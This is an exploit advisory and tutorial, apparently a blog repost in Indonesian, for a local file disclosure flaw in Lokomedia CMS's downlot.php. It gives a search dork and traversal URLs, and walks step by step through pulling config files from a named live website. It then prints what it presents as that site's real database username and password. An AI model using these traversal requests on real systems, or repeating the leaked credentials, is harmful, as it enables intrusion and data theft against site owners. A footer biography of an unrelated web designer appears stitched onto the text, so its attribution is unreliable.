Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Vendor : http://bukulokomedia.com

[+] Discovered : vir0e5 a.k.a banditc0de

[+] Contact : vir0e5[at]hackermail[dot]com

[+] Site : http://vir0e5.blogspot.com

[+] DorK : inurl:/downlot.php?file=

[+] Exploit : http://[host]/[dir]/downlot.php?file=../config/koneksi.php

[+] Demo : http://pulsaselluler.com/downlot.php?file=../config/koneksi.php

Tutorial :
Untuk Target awal adalah URL di atas http://pulsaselluler.com alasannya paling atas di search google..hehe..

kalau mau cari lagi silahkan gunakan "Dork" di atas atau bisa kreatif dikit..
1. Cari halaman download pada CMS tersebut
http://pulsaselluler.com/download.html
Nanti ada file-file Download , itu juga kalo ada file yang di share dari dalam web nya, kalo ga ada pake aja /downlot.php?file= , karena file download pada web tersebut menggunakan link itu.
2. Coba download file: /index.php , kenapa kita harus download/ambil file index.php dulu??? untuk cari file koneksi web tersebut, karena penting untuk menghubungkan antara web tersebut dengan Databasenya. cara dapetinnya http://pulsaselluler.com/downlot.php?file=../index.php

3. Setelah Download file index.php ,buka dengan notepad atau text editor lainnya!!
4. Cari script di dalam File tersebut yang terkoneksi dengan file yang menghubungkan ke DB
, karena file tersebut hanya ada

include "rss.php";

header('location:home');

nah, disana ada file include yang mengambil data file rss.php , kita coba lagi download file rss.php
, hampir sama karena tidak masuk ke Direktori lain
http://pulsaselluler.com/downlot.php?file=../rss.php

5. Biasa buka file rss.php dengan notepad, dan di dalamnya ada

<?php
include "config/koneksi.php";

$sql = mysql_query("SELECT * FROM berita ORDER BY id_berita DESC LIMIT 5");

$file = fopen("rss.xml", "w");

fwrite($file, '<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>PulsaSelluler.com Feed</title>
<link>http://pulsaselluler.com</link>
<description>Feed Description</description>
<language>en-us</language>');

while($r=mysql_fetch_array($sql)){
$isi_berita = htmlentities(strip_tags(nl2br($r[isi_berita]))); // membuat paragraf pada isi berita dan mengabaikan tag html
$isi   = substr($isi_berita,0,220); // ambil sebanyak 220 karakter
$isi   = substr($isi_berita,0,strrpos($isi," ")); // potong per spasi kalimat

fwrite($file, "<item>
                 <title>$r[judul]</title>
                 <link>http://pulsaselluler.com/berita-$r[id_berita]-$r[judul_seo].html</link>
                 <description>$isi ...</description>
                 </item>");
}

fwrite($file, "</channel></rss>");
fclose($file);
?>

Ternyata dapet file koneksi.php di direktori config .. kita telusuri lagi, karena dah tau silahkan ambil file koneksi.php tersebut, karena di dalam directory /config , kita cuma nambahin
http://pulsaselluler.com/downlot.php?file=../config/koneksi.php

6. Buka File tersebut dan hasilnya kita mendapatkan , username , password, dan nama database web tersebut

$server = "localhost";

$username = "pulsasel_kangbas";

$password = "117167117167";

$database = "pulsasel_pusell";

// Koneksi dan memilih database di server

mysql_connect($server,$username,$password) or die("Koneksi gagal");

mysql_select_db($database) or die("Database tidak bisa dibuka");

http://securityreason.com/securityalert/7359
http://packetstormsecurity.org/1005-exploits/lokomediacms-disclose.txt
http://www.exploit-db.com/exploits/12651
http://inj3ct0r.com/exploits/12285

Note: File "koneksi.php" adalah file yang menghubungkan antara aplikasi web tersebut dengan database.

untuk mempelajari CMS itu, saya share link donlodnya ... http://www.4shared.com/file/yO7zThp3/cmslokomediatar.html

by Jillur Rahman

Jillur Rahman is a Web designers. He enjoys to make blogger templates. He always try to make modern and 3D looking Templates. You can by his templates from Themeforest.

Follow him @ Twitter | Facebook | Google Plus